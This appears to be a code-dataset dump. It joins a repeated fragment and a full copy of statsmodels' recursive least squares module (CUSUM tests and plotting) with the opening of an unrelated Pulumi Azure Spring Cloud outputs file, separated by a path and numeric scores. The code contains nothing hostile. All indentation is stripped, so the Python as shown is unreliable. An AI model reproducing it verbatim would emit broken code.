Journal of the Royal Statistical Society.
Series B (Methodological) 37 (2): 149-92.
"""
# Create the plot
from statsmodels.graphics.utils import _import_mpl, create_mpl_fig
plt = _import_mpl()
fig = create_mpl_fig(fig, figsize)
ax = fig.add_subplot(1, 1, 1)
# Get dates, if applicable
if hasattr(self.data, 'dates') and self.data.dates is not None:
dates = self.data.dates._mpl_repr()
else:
dates = np.arange(self.nobs)
d = max(self.nobs_diffuse, self.loglikelihood_burn)
# Plot cusum series and reference line
ax.plot(dates[d:], self.cusum, label='CUSUM')
ax.hlines(0, dates[d], dates[-1], color='k', alpha=0.3)
# Plot significance bounds
lower_line, upper_line = self._cusum_significance_bounds(alpha)
ax.plot([dates[d], dates[-1]], upper_line, 'k--',
label='%d%% significance' % (alpha * 100))
ax.plot([dates[d], dates[-1]], lower_line, 'k--')
ax.legend(loc=legend_loc)
return fig
def _cusum_squares_significance_bounds(self, alpha, points=None):
"""
Notes
-----
Comparing against the cusum6 package for Stata, this does not produce
exactly the same confidence bands (which are produced in cusum6 by
lww, uww) because they use a different method for computing the
critical value; in particular, they use tabled values from
Table C, pp. 364-365 of "The Econometric Analysis of Time Series"
Harvey, (1990), and use the value given to 99 observations for any
larger number of observations. In contrast, we use the approximating
critical values suggested in Edgerton and Wells (1994) which allows
computing relatively good approximations for any number of
observations.
"""
# Get the approximate critical value associated with the significance
# level
d = max(self.nobs_diffuse, self.loglikelihood_burn)
n = 0.5 * (self.nobs - d) - 1
try:
ix = [0.1, 0.05, 0.025, 0.01, 0.005].index(alpha / 2)
except ValueError:
raise ValueError('Invalid significance level.')
scalars = _cusum_squares_scalars[:, ix]
crit = scalars[0] / n**0.5 + scalars[1] / n + scalars[2] / n**1.5
# Get the points for the significance bound lines
if points is None:
points = np.array([d, self.nobs])
line = (points - d) / (self.nobs - d)
return line - crit, line + crit
def plot_cusum_squares(self, alpha=0.05, legend_loc='upper left',
fig=None, figsize=None):
r"""
Plot the CUSUM of squares statistic and significance bounds.
Parameters
----------
alpha : float, optional
The plotted significance bounds are alpha %.
legend_loc : string, optional
The location of the legend in the plot. Default is upper left.
fig : Matplotlib Figure instance, optional
If given, subplots are created in this figure instead of in a new
figure. Note that the grid will be created in the provided
figure using `fig.add_subplot()`.
figsize : tuple, optional
If a figure is created, this argument allows specifying a size.
The tuple is (width, height).
Notes
-----
Evidence of parameter instability may be found if the CUSUM of squares
statistic moves out of the significance bounds.
Critical values used in creating the significance bounds are computed
using the approximate formula of [1]_.
References
----------
.. [*] <NAME>., <NAME>, and <NAME>. 1975.
"Techniques for Testing the Constancy of
Regression Relationships over Time."
Journal of the Royal Statistical Society.
Series B (Methodological) 37 (2): 149-92.
.. [1] Edgerton, David, and <NAME>. 1994.
"Critical Values for the Cusumsq Statistic
in Medium and Large Sized Samples."
Oxford Bulletin of Economics and Statistics 56 (3): 355-65.
"""
# Create the plot
from statsmodels.graphics.utils import _import_mpl, create_mpl_fig
plt = _import_mpl()
fig = create_mpl_fig(fig, figsize)
ax = fig.add_subplot(1, 1, 1)
# Get dates, if applicable
if hasattr(self.data, 'dates') and self.data.dates is not None:
dates = self.data.dates._mpl_repr()
else:
dates = np.arange(self.nobs)
d = max(self.nobs_diffuse, self.loglikelihood_burn)
# Plot cusum series and reference line
ax.plot(dates[d:], self.cusum_squares, label='CUSUM of squares')
ref_line = (np.arange(d, self.nobs) - d) / (self.nobs - d)
ax.plot(dates[d:], ref_line, 'k', alpha=0.3)
# Plot significance bounds
lower_line, upper_line = self._cusum_squares_significance_bounds(alpha)
ax.plot([dates[d], dates[-1]], upper_line, 'k--',
label='%d%% significance' % (alpha * 100))
ax.plot([dates[d], dates[-1]], lower_line, 'k--')
ax.legend(loc=legend_loc)
return fig
class RecursiveLSResultsWrapper(MLEResultsWrapper):
_attrs = {}
_wrap_attrs = wrap.union_dicts(MLEResultsWrapper._wrap_attrs,
_attrs)
_methods = {}
_wrap_methods = wrap.union_dicts(MLEResultsWrapper._wrap_methods,
_methods)
wrap.populate_wrapper(RecursiveLSResultsWrapper, RecursiveLSResults) | statsmodels/regression/recursive_ls.py | from __future__ import division, absolute_import, print_function
try: unicode
except NameError: unicode = str
from warnings import warn
from statsmodels.compat.collections import OrderedDict
import numpy as np
import pandas as pd
from statsmodels.regression.linear_model import OLS
from statsmodels.tools.data import _is_using_pandas
from statsmodels.tsa.statespace.mlemodel import (
MLEModel, MLEResults, MLEResultsWrapper, PredictionResults,
PredictionResultsWrapper)
from statsmodels.tools.tools import Bunch
from statsmodels.tools.decorators import cache_readonly, resettable_cache
import statsmodels.base.wrapper as wrap
# Columns are alpha = 0.1, 0.05, 0.025, 0.01, 0.005
_cusum_squares_scalars = np.array([
[1.0729830, 1.2238734, 1.3581015, 1.5174271, 1.6276236],
[-0.6698868, -0.6700069, -0.6701218, -0.6702672, -0.6703724],
[-0.5816458, -0.7351697, -0.8858694, -1.0847745, -1.2365861]
])
class RecursiveLS(MLEModel):
r"""
Recursive least squares
Parameters
----------
endog : array_like
The observed time-series process :math:`y`
exog : array_like
Array of exogenous regressors, shaped nobs x k.
constraints : array-like, str, or tuple
- array : An r x k array where r is the number of restrictions to
test and k is the number of regressors. It is assumed that the
linear combination is equal to zero.
- str : The full hypotheses to test can be given as a string.
See the examples.
- tuple : A tuple of arrays in the form (R, q), ``q`` can be
either a scalar or a length p row vector.
Notes
-----
Recursive least squares (RLS) corresponds to expanding window ordinary
least squares (OLS).
This model applies the Kalman filter to compute recursive estimates of the
coefficients and recursive residuals.
References
----------
.. [*] <NAME>, and <NAME>. 2012.
Time Series Analysis by State Space Methods: Second Edition.
Oxford University Press.
"""
def __init__(self, endog, exog, constraints=None, **kwargs):
# Standardize data
if not _is_using_pandas(endog, None):
endog = np.asanyarray(endog)
exog_is_using_pandas = _is_using_pandas(exog, None)
if not exog_is_using_pandas:
exog = np.asarray(exog)
# Make sure we have 2-dimensional array
if exog.ndim == 1:
if not exog_is_using_pandas:
exog = exog[:, None]
else:
exog = pd.DataFrame(exog)
self.k_exog = exog.shape[1]
# Handle constraints
self.k_constraints = 0
self._r_matrix = self._q_matrix = None
if constraints is not None:
from patsy import DesignInfo
from statsmodels.base.data import handle_data
data = handle_data(endog, exog, **kwargs)
names = data.param_names
LC = DesignInfo(names).linear_constraint(constraints)
self._r_matrix, self._q_matrix = LC.coefs, LC.constants
self.k_constraints = self._r_matrix.shape[0]
endog = np.c_[endog, np.zeros((len(endog), len(self._r_matrix)))]
endog[:, 1:] = self._q_matrix
# Handle coefficient initialization
kwargs.setdefault('initialization', 'diffuse')
# Initialize the state space representation
super(RecursiveLS, self).__init__(
endog, k_states=self.k_exog, exog=exog, **kwargs)
# Use univariate filtering by default
self.ssm.filter_univariate = True
# Concentrate the scale out of the likelihood function
self.ssm.filter_concentrated = True
# Setup the state space representation
self['design'] = np.zeros((self.k_endog, self.k_states, self.nobs))
self['design', 0] = self.exog[:, :, None].T
if self._r_matrix is not None:
self['design', 1:, :] = self._r_matrix[:, :, None]
self['transition'] = np.eye(self.k_states)
# Notice that the filter output does not depend on the measurement
# variance, so we set it here to 1
self['obs_cov', 0, 0] = 1.
self['transition'] = np.eye(self.k_states)
# Linear constraints are technically imposed by adding "fake" endog
# variables that are used during filtering, but for all model- and
# results-based purposes we want k_endog = 1.
if self._r_matrix is not None:
self.k_endog = 1
@classmethod
def from_formula(cls, formula, data, subset=None, constraints=None):
return super(MLEModel, cls).from_formula(formula, data, subset,
constraints=constraints)
def fit(self):
"""
Fits the model by application of the Kalman filter
Returns
-------
RecursiveLSResults
"""
smoother_results = self.smooth(return_ssm=True)
with self.ssm.fixed_scale(smoother_results.scale):
res = self.smooth()
return res
def filter(self, return_ssm=False, **kwargs):
# Get the state space output
result = super(RecursiveLS, self).filter([], transformed=True,
cov_type='none',
return_ssm=True, **kwargs)
# Wrap in a results object
if not return_ssm:
params = result.filtered_state[:, -1]
cov_kwds = {
'custom_cov_type': 'nonrobust',
'custom_cov_params': result.filtered_state_cov[:, :, -1],
'custom_description': ('Parameters and covariance matrix'
' estimates are RLS estimates'
' conditional on the entire sample.')
}
result = RecursiveLSResultsWrapper(
RecursiveLSResults(self, params, result, cov_type='custom',
cov_kwds=cov_kwds)
)
return result
def smooth(self, return_ssm=False, **kwargs):
# Get the state space output
result = super(RecursiveLS, self).smooth([], transformed=True,
cov_type='none',
return_ssm=True, **kwargs)
# Wrap in a results object
if not return_ssm:
params = result.filtered_state[:, -1]
cov_kwds = {
'custom_cov_type': 'nonrobust',
'custom_cov_params': result.filtered_state_cov[:, :, -1],
'custom_description': ('Parameters and covariance matrix'
' estimates are RLS estimates'
' conditional on the entire sample.')
}
result = RecursiveLSResultsWrapper(
RecursiveLSResults(self, params, result, cov_type='custom',
cov_kwds=cov_kwds)
)
return result
@property
def param_names(self):
return self.exog_names
@property
def start_params(self):
# Only parameter is the measurement disturbance standard deviation
return np.zeros(0)
def update(self, params, **kwargs):
"""
Update the parameters of the model
Updates the representation matrices to fill in the new parameter
values.
Parameters
----------
params : array_like
Array of new parameters.
transformed : boolean, optional
Whether or not `params` is already transformed. If set to False,
`transform_params` is called. Default is True..
Returns
-------
params : array_like
Array of parameters.
"""
pass
class RecursiveLSResults(MLEResults):
"""
Class to hold results from fitting a recursive least squares model.
Parameters
----------
model : RecursiveLS instance
The fitted model instance
Attributes
----------
specification : dictionary
Dictionary including all attributes from the recursive least squares
model instance.
See Also
--------
statsmodels.tsa.statespace.kalman_filter.FilterResults
statsmodels.tsa.statespace.mlemodel.MLEResults
"""
def __init__(self, model, params, filter_results, cov_type='opg',
**kwargs):
super(RecursiveLSResults, self).__init__(
model, params, filter_results, cov_type, **kwargs)
# Since we are overriding params with things that aren't MLE params,
# need to adjust df's
q = max(self.loglikelihood_burn, self.k_diffuse_states)
self.df_model = q - self.model.k_constraints
self.df_resid = self.nobs_effective - self.df_model
# Save _init_kwds
self._init_kwds = self.model._get_init_kwds()
# Save the model specification
self.specification = Bunch(**{
'k_exog': self.model.k_exog,
'k_constraints': self.model.k_constraints})
@property
def recursive_coefficients(self):
"""
Estimates of regression coefficients, recursively estimated
Returns
-------
out: Bunch
Has the following attributes:
- `filtered`: a time series array with the filtered estimate of
the component
- `filtered_cov`: a time series array with the filtered estimate of
the variance/covariance of the component
- `smoothed`: a time series array with the smoothed estimate of
the component
- `smoothed_cov`: a time series array with the smoothed estimate of
the variance/covariance of the component
- `offset`: an integer giving the offset in the state vector where
this component begins
"""
out = None
spec = self.specification
start = offset = 0
end = offset + spec.k_exog
out = Bunch(
filtered=self.filtered_state[start:end],
filtered_cov=self.filtered_state_cov[start:end, start:end],
smoothed=None, smoothed_cov=None,
offset=offset
)
if self.smoothed_state is not None:
out.smoothed = self.smoothed_state[start:end]
if self.smoothed_state_cov is not None:
out.smoothed_cov = (
self.smoothed_state_cov[start:end, start:end])
return out
@cache_readonly
def resid_recursive(self):
r"""
Recursive residuals
Returns
-------
resid_recursive : array_like
An array of length `nobs` holding the recursive
residuals.
Notes
-----
These quantities are defined in, for example, Harvey (1989)
section 5.4. In fact, there he defines the standardized innovations in
equation 5.4.1, but in his version they have non-unit variance, whereas
the standardized forecast errors computed by the Kalman filter here
assume unit variance. To convert to Harvey's definition, we need to
multiply by the standard deviation.
Harvey notes that in smaller samples, "although the second moment
of the :math:`\tilde \sigma_*^{-1} \tilde v_t`'s is unity, the
variance is not necessarily equal to unity as the mean need not be
equal to zero", and he defines an alternative version (which are
not provided here).
"""
return (self.filter_results.standardized_forecasts_error[0] *
self.scale**0.5)
@cache_readonly
def cusum(self):
r"""
Cumulative sum of standardized recursive residuals statistics
Returns
-------
cusum : array_like
An array of length `nobs - k_exog` holding the
CUSUM statistics.
Notes
-----
The CUSUM statistic takes the form:
.. math::
W_t = \frac{1}{\hat \sigma} \sum_{j=k+1}^t w_j
where :math:`w_j` is the recursive residual at time :math:`j` and
:math:`\hat \sigma` is the estimate of the standard deviation
from the full sample.
Excludes the first `k_exog` datapoints.
Due to differences in the way :math:`\hat \sigma` is calculated, the
output of this function differs slightly from the output in the
R package strucchange and the Stata contributed .ado file cusum6. The
calculation in this package is consistent with the description of
Brown et al. (1975)
References
----------
.. [*] <NAME>., <NAME>, and <NAME>. 1975.
"Techniques for Testing the Constancy of
Regression Relationships over Time."
Journal of the Royal Statistical Society.
Series B (Methodological) 37 (2): 149-92.
"""
d = max(self.nobs_diffuse, self.loglikelihood_burn)
return (np.cumsum(self.resid_recursive[d:]) /
np.std(self.resid_recursive[d:], ddof=1))
@cache_readonly
def cusum_squares(self):
r"""
Cumulative sum of squares of standardized recursive residuals
statistics
Returns
-------
cusum_squares : array_like
An array of length `nobs - k_exog` holding the
CUSUM of squares statistics.
Notes
-----
The CUSUM of squares statistic takes the form:
.. math::
s_t = \left ( \sum_{j=k+1}^t w_j^2 \right ) \Bigg /
\left ( \sum_{j=k+1}^T w_j^2 \right )
where :math:`w_j` is the recursive residual at time :math:`j`.
Excludes the first `k_exog` datapoints.
References
----------
.. [*] <NAME>., <NAME>, and <NAME>. 1975.
"Techniques for Testing the Constancy of
Regression Relationships over Time."
Journal of the Royal Statistical Society.
Series B (Methodological) 37 (2): 149-92.
"""
d = max(self.nobs_diffuse, self.loglikelihood_burn)
numer = np.cumsum(self.resid_recursive[d:]**2)
denom = numer[-1]
return numer / denom
@cache_readonly
def llf_recursive_obs(self):
"""
(float) Loglikelihood at observation, computed from recursive residuals
"""
from scipy.stats import norm
return np.log(norm.pdf(self.resid_recursive, loc=0,
scale=self.scale**0.5))
@cache_readonly
def llf_recursive(self):
"""
(float) Loglikelihood defined by recursive residuals, equivalent to OLS
"""
return np.sum(self.llf_recursive_obs)
@cache_readonly
def ssr(self):
d = max(self.nobs_diffuse, self.loglikelihood_burn)
return (self.nobs - d) * self.filter_results.obs_cov[0, 0, 0]
@cache_readonly
def centered_tss(self):
return np.sum((self.filter_results.endog[0] -
np.mean(self.filter_results.endog))**2)
@cache_readonly
def uncentered_tss(self):
return np.sum((self.filter_results.endog[0])**2)
@cache_readonly
def ess(self):
if self.k_constant:
return self.centered_tss - self.ssr
else:
return self.uncentered_tss - self.ssr
@cache_readonly
def rsquared(self):
if self.k_constant:
return 1 - self.ssr / self.centered_tss
else:
return 1 - self.ssr / self.uncentered_tss
@cache_readonly
def mse_model(self):
return self.ess / self.df_model
@cache_readonly
def mse_resid(self):
return self.ssr / self.df_resid
@cache_readonly
def mse_total(self):
if self.k_constant:
return self.centered_tss / (self.df_resid + self.df_model)
else:
return self.uncentered_tss / (self.df_resid + self.df_model)
def get_prediction(self, start=None, end=None, dynamic=False,
index=None, **kwargs):
# Note: need to override this, because we currently don't support
# dynamic prediction or forecasts when there are constraints.
if start is None:
start = self.model._index[0]
# Handle start, end, dynamic
start, end, out_of_sample, prediction_index = (
self.model._get_prediction_index(start, end, index))
# Handle `dynamic`
if isinstance(dynamic, (bytes, unicode)):
dynamic, _, _ = self.model._get_index_loc(dynamic)
if self.model._r_matrix is not None and (out_of_sample or dynamic):
raise NotImplementedError('Cannot yet perform out-of-sample or'
' dynamic prediction in models with'
' constraints.')
# Perform the prediction
# This is a (k_endog x npredictions) array; don't want to squeeze in
# case of npredictions = 1
prediction_results = self.filter_results.predict(
start, end + out_of_sample + 1, dynamic, **kwargs)
# Return a new mlemodel.PredictionResults object
return PredictionResultsWrapper(PredictionResults(
self, prediction_results, row_labels=prediction_index))
get_prediction.__doc__ = MLEResults.get_prediction.__doc__
def plot_recursive_coefficient(self, variables=0, alpha=0.05,
legend_loc='upper left', fig=None,
figsize=None):
r"""
Plot the recursively estimated coefficients on a given variable
Parameters
----------
variables : int or str or iterable of int or string, optional
Integer index or string name of the variable whose coefficient will
be plotted. Can also be an iterable of integers or strings. Default
is the first variable.
alpha : float, optional
The confidence intervals for the coefficient are (1 - alpha) %
legend_loc : string, optional
The location of the legend in the plot. Default is upper left.
fig : Matplotlib Figure instance, optional
If given, subplots are created in this figure instead of in a new
figure. Note that the grid will be created in the provided
figure using `fig.add_subplot()`.
figsize : tuple, optional
If a figure is created, this argument allows specifying a size.
The tuple is (width, height).
Notes
-----
All plots contain (1 - `alpha`) % confidence intervals.
"""
# Get variables
if isinstance(variables, (int, str)):
variables = [variables]
k_variables = len(variables)
# If a string was given for `variable`, try to get it from exog names
exog_names = self.model.exog_names
for i in range(k_variables):
variable = variables[i]
if isinstance(variable, str):
variables[i] = exog_names.index(variable)
# Create the plot
from scipy.stats import norm
from statsmodels.graphics.utils import _import_mpl, create_mpl_fig
plt = _import_mpl()
fig = create_mpl_fig(fig, figsize)
for i in range(k_variables):
variable = variables[i]
ax = fig.add_subplot(k_variables, 1, i + 1)
# Get dates, if applicable
if hasattr(self.data, 'dates') and self.data.dates is not None:
dates = self.data.dates._mpl_repr()
else:
dates = np.arange(self.nobs)
d = max(self.nobs_diffuse, self.loglikelihood_burn)
# Plot the coefficient
coef = self.recursive_coefficients
ax.plot(dates[d:], coef.filtered[variable, d:],
label='Recursive estimates: %s' % exog_names[variable])
# Legend
handles, labels = ax.get_legend_handles_labels()
# Get the critical value for confidence intervals
if alpha is not None:
critical_value = norm.ppf(1 - alpha / 2.)
# Plot confidence intervals
std_errors = np.sqrt(coef.filtered_cov[variable, variable, :])
ci_lower = (
coef.filtered[variable] - critical_value * std_errors)
ci_upper = (
coef.filtered[variable] + critical_value * std_errors)
ci_poly = ax.fill_between(
dates[d:], ci_lower[d:], ci_upper[d:], alpha=0.2
)
ci_label = ('$%.3g \\%%$ confidence interval'
% ((1 - alpha)*100))
# Only add CI to legend for the first plot
if i == 0:
# Proxy artist for fill_between legend entry
# See http://matplotlib.org/1.3.1/users/legend_guide.html
p = plt.Rectangle((0, 0), 1, 1,
fc=ci_poly.get_facecolor()[0])
handles.append(p)
labels.append(ci_label)
ax.legend(handles, labels, loc=legend_loc)
# Remove xticks for all but the last plot
if i < k_variables - 1:
ax.xaxis.set_ticklabels([])
fig.tight_layout()
return fig
def _cusum_significance_bounds(self, alpha, ddof=0, points=None):
"""
Parameters
----------
alpha : float, optional
The significance bound is alpha %.
ddof : int, optional
The number of periods additional to `k_exog` to exclude in
constructing the bounds. Default is zero. This is usually used
only for testing purposes.
points : iterable, optional
The points at which to evaluate the significance bounds. Default is
two points, beginning and end of the sample.
Notes
-----
Comparing against the cusum6 package for Stata, this does not produce
exactly the same confidence bands (which are produced in cusum6 by
lw, uw) because they burn the first k_exog + 1 periods instead of the
first k_exog. If this change is performed
(so that `tmp = (self.nobs - d - 1)**0.5`), then the output here
matches cusum6.
The cusum6 behavior does not seem to be consistent with
Brown et al. (1975); it is likely they did that because they needed
three initial observations to get the initial OLS estimates, whereas
we do not need to do that.
"""
# Get the constant associated with the significance level
if alpha == 0.01:
scalar = 1.143
elif alpha == 0.05:
scalar = 0.948
elif alpha == 0.10:
scalar = 0.950
else:
raise ValueError('Invalid significance level.')
# Get the points for the significance bound lines
d = max(self.nobs_diffuse, self.loglikelihood_burn)
tmp = (self.nobs - d - ddof)**0.5
upper_line = lambda x: scalar * tmp + 2 * scalar * (x - d) / tmp
if points is None:
points = np.array([d, self.nobs])
return -upper_line(points), upper_line(points)
def plot_cusum(self, alpha=0.05, legend_loc='upper left',
fig=None, figsize=None):
r"""
Plot the CUSUM statistic and significance bounds.
Parameters
----------
alpha : float, optional
The plotted significance bounds are alpha %.
legend_loc : string, optional
The location of the legend in the plot. Default is upper left.
fig : Matplotlib Figure instance, optional
If given, subplots are created in this figure instead of in a new
figure. Note that the grid will be created in the provided
figure using `fig.add_subplot()`.
figsize : tuple, optional
If a figure is created, this argument allows specifying a size.
The tuple is (width, height).
Notes
-----
Evidence of parameter instability may be found if the CUSUM statistic
moves out of the significance bounds.
References
----------
.. [*] <NAME>., <NAME>, and <NAME>. 1975.
"Techniques for Testing the Constancy of
Regression Relationships over Time."
Journal of the Royal Statistical Society.
Series B (Methodological) 37 (2): 149-92.
"""
# Create the plot
from statsmodels.graphics.utils import _import_mpl, create_mpl_fig
plt = _import_mpl()
fig = create_mpl_fig(fig, figsize)
ax = fig.add_subplot(1, 1, 1)
# Get dates, if applicable
if hasattr(self.data, 'dates') and self.data.dates is not None:
dates = self.data.dates._mpl_repr()
else:
dates = np.arange(self.nobs)
d = max(self.nobs_diffuse, self.loglikelihood_burn)
# Plot cusum series and reference line
ax.plot(dates[d:], self.cusum, label='CUSUM')
ax.hlines(0, dates[d], dates[-1], color='k', alpha=0.3)
# Plot significance bounds
lower_line, upper_line = self._cusum_significance_bounds(alpha)
ax.plot([dates[d], dates[-1]], upper_line, 'k--',
label='%d%% significance' % (alpha * 100))
ax.plot([dates[d], dates[-1]], lower_line, 'k--')
ax.legend(loc=legend_loc)
return fig
def _cusum_squares_significance_bounds(self, alpha, points=None):
"""
Notes
-----
Comparing against the cusum6 package for Stata, this does not produce
exactly the same confidence bands (which are produced in cusum6 by
lww, uww) because they use a different method for computing the
critical value; in particular, they use tabled values from
Table C, pp. 364-365 of "The Econometric Analysis of Time Series"
Harvey, (1990), and use the value given to 99 observations for any
larger number of observations. In contrast, we use the approximating
critical values suggested in Edgerton and Wells (1994) which allows
computing relatively good approximations for any number of
observations.
"""
# Get the approximate critical value associated with the significance
# level
d = max(self.nobs_diffuse, self.loglikelihood_burn)
n = 0.5 * (self.nobs - d) - 1
try:
ix = [0.1, 0.05, 0.025, 0.01, 0.005].index(alpha / 2)
except ValueError:
raise ValueError('Invalid significance level.')
scalars = _cusum_squares_scalars[:, ix]
crit = scalars[0] / n**0.5 + scalars[1] / n + scalars[2] / n**1.5
# Get the points for the significance bound lines
if points is None:
points = np.array([d, self.nobs])
line = (points - d) / (self.nobs - d)
return line - crit, line + crit
def plot_cusum_squares(self, alpha=0.05, legend_loc='upper left',
fig=None, figsize=None):
r"""
Plot the CUSUM of squares statistic and significance bounds.
Parameters
----------
alpha : float, optional
The plotted significance bounds are alpha %.
legend_loc : string, optional
The location of the legend in the plot. Default is upper left.
fig : Matplotlib Figure instance, optional
If given, subplots are created in this figure instead of in a new
figure. Note that the grid will be created in the provided
figure using `fig.add_subplot()`.
figsize : tuple, optional
If a figure is created, this argument allows specifying a size.
The tuple is (width, height).
Notes
-----
Evidence of parameter instability may be found if the CUSUM of squares
statistic moves out of the significance bounds.
Critical values used in creating the significance bounds are computed
using the approximate formula of [1]_.
References
----------
.. [*] <NAME>., <NAME>, and <NAME>. 1975.
"Techniques for Testing the Constancy of
Regression Relationships over Time."
Journal of the Royal Statistical Society.
Series B (Methodological) 37 (2): 149-92.
.. [1] Edgerton, David, and <NAME>. 1994.
"Critical Values for the Cusumsq Statistic
in Medium and Large Sized Samples."
Oxford Bulletin of Economics and Statistics 56 (3): 355-65.
"""
# Create the plot
from statsmodels.graphics.utils import _import_mpl, create_mpl_fig
plt = _import_mpl()
fig = create_mpl_fig(fig, figsize)
ax = fig.add_subplot(1, 1, 1)
# Get dates, if applicable
if hasattr(self.data, 'dates') and self.data.dates is not None:
dates = self.data.dates._mpl_repr()
else:
dates = np.arange(self.nobs)
d = max(self.nobs_diffuse, self.loglikelihood_burn)
# Plot cusum series and reference line
ax.plot(dates[d:], self.cusum_squares, label='CUSUM of squares')
ref_line = (np.arange(d, self.nobs) - d) / (self.nobs - d)
ax.plot(dates[d:], ref_line, 'k', alpha=0.3)
# Plot significance bounds
lower_line, upper_line = self._cusum_squares_significance_bounds(alpha)
ax.plot([dates[d], dates[-1]], upper_line, 'k--',
label='%d%% significance' % (alpha * 100))
ax.plot([dates[d], dates[-1]], lower_line, 'k--')
ax.legend(loc=legend_loc)
return fig
class RecursiveLSResultsWrapper(MLEResultsWrapper):
_attrs = {}
_wrap_attrs = wrap.union_dicts(MLEResultsWrapper._wrap_attrs,
_attrs)
_methods = {}
_wrap_methods = wrap.union_dicts(MLEResultsWrapper._wrap_methods,
_methods)
wrap.populate_wrapper(RecursiveLSResultsWrapper, RecursiveLSResults) | 0.923589 | 0.454654 |
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
__all__ = [
'SpringCloudAppIdentity',
'SpringCloudAppPersistentDisk',
'SpringCloudServiceConfigServerGitSetting',
'SpringCloudServiceConfigServerGitSettingHttpBasicAuth',
'SpringCloudServiceConfigServerGitSettingRepository',
'SpringCloudServiceConfigServerGitSettingRepositoryHttpBasicAuth',
'SpringCloudServiceConfigServerGitSettingRepositorySshAuth',
'SpringCloudServiceConfigServerGitSettingSshAuth',
'SpringCloudServiceNetwork',
'SpringCloudServiceRequiredNetworkTrafficRule',
'SpringCloudServiceTrace',
'GetSpringCloudAppIdentityResult',
'GetSpringCloudAppPersistentDiskResult',
'GetSpringCloudServiceConfigServerGitSettingResult',
'GetSpringCloudServiceConfigServerGitSettingHttpBasicAuthResult',
'GetSpringCloudServiceConfigServerGitSettingRepositoryResult',
'GetSpringCloudServiceConfigServerGitSettingRepositoryHttpBasicAuthResult',
'GetSpringCloudServiceConfigServerGitSettingRepositorySshAuthResult',
'GetSpringCloudServiceConfigServerGitSettingSshAuthResult',
'GetSpringCloudServiceRequiredNetworkTrafficRuleResult',
]
@pulumi.output_type
class SpringCloudAppIdentity(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "principalId":
suggest = "principal_id"
elif key == "tenantId":
suggest = "tenant_id"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in SpringCloudAppIdentity. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
SpringCloudAppIdentity.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
SpringCloudAppIdentity.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
principal_id: Optional[str] = None,
tenant_id: Optional[str] = None,
type: Optional[str] = None):
"""
:param str principal_id: The Principal ID for the Service Principal associated with the Managed Service Identity of this Spring Cloud Application.
:param str tenant_id: The Tenant ID for the Service Principal associated with the Managed Service Identity of this Spring Cloud Application.
:param str type: Specifies the identity type of the Spring Cloud Application. Possible value is `SystemAssigned`.
"""
if principal_id is not None:
pulumi.set(__self__, "principal_id", principal_id)
if tenant_id is not None:
pulumi.set(__self__, "tenant_id", tenant_id)
if type is not None:
pulumi.set(__self__, "type", type)
@property
@pulumi.getter(name="principalId")
def principal_id(self) -> Optional[str]:
"""
The Principal ID for the Service Principal associated with the Managed Service Identity of this Spring Cloud Application.
"""
return pulumi.get(self, "principal_id")
@property
@pulumi.getter(name="tenantId")
def tenant_id(self) -> Optional[str]:
"""
The Tenant ID for the Service Principal associated with the Managed Service Identity of this Spring Cloud Application.
"""
return pulumi.get(self, "tenant_id")
@property
@pulumi.getter
def type(self) -> Optional[str]:
"""
Specifies the identity type of the Spring Cloud Application. Possible value is `SystemAssigned`.
"""
return pulumi.get(self, "type")
@pulumi.output_type
class SpringCloudAppPersistentDisk(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "sizeInGb":
suggest = "size_in_gb"
elif key == "mountPath":
suggest = "mount_path"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in SpringCloudAppPersistentDisk. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
SpringCloudAppPersistentDisk.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
SpringCloudAppPersistentDisk.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
size_in_gb: int,
mount_path: Optional[str] = None):
"""
:param int size_in_gb: Specifies the size of the persistent disk in GB. Possible values are between `0` and `50`.
:param str mount_path: Specifies the mount path of the persistent disk. Defaults to `/persistent`.
"""
pulumi.set(__self__, "size_in_gb", size_in_gb)
if mount_path is not None:
pulumi.set(__self__, "mount_path", mount_path)
@property
@pulumi.getter(name="sizeInGb")
def size_in_gb(self) -> int:
"""
Specifies the size of the persistent disk in GB. Possible values are between `0` and `50`.
"""
return pulumi.get(self, "size_in_gb")
@property
@pulumi.getter(name="mountPath")
def mount_path(self) -> Optional[str]:
"""
Specifies the mount path of the persistent disk. Defaults to `/persistent`.
"""
return pulumi.get(self, "mount_path")
@pulumi.output_type
class SpringCloudServiceConfigServerGitSetting(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "httpBasicAuth":
suggest = "http_basic_auth"
elif key == "searchPaths":
suggest = "search_paths"
elif key == "sshAuth":
suggest = "ssh_auth"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in SpringCloudServiceConfigServerGitSetting. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
SpringCloudServiceConfigServerGitSetting.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
SpringCloudServiceConfigServerGitSetting.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
uri: str,
http_basic_auth: Optional['outputs.SpringCloudServiceConfigServerGitSettingHttpBasicAuth'] = None,
label: Optional[str] = None,
repositories: Optional[Sequence['outputs.SpringCloudServiceConfigServerGitSettingRepository']] = None,
search_paths: Optional[Sequence[str]] = None,
ssh_auth: Optional['outputs.SpringCloudServiceConfigServerGitSettingSshAuth'] = None):
"""
:param str uri: The URI of the default Git repository used as the Config Server back end, should be started with `http://`, `https://`, `git@`, or `ssh://`.
:param 'SpringCloudServiceConfigServerGitSettingHttpBasicAuthArgs' http_basic_auth: A `http_basic_auth` block as defined below.
:param str label: The default label of the Git repository, should be the branch name, tag name, or commit-id of the repository.
:param Sequence['SpringCloudServiceConfigServerGitSettingRepositoryArgs'] repositories: One or more `repository` blocks as defined below.
:param Sequence[str] search_paths: An array of strings used to search subdirectories of the Git repository.
:param 'SpringCloudServiceConfigServerGitSettingSshAuthArgs' ssh_auth: A `ssh_auth` block as defined below.
"""
pulumi.set(__self__, "uri", uri)
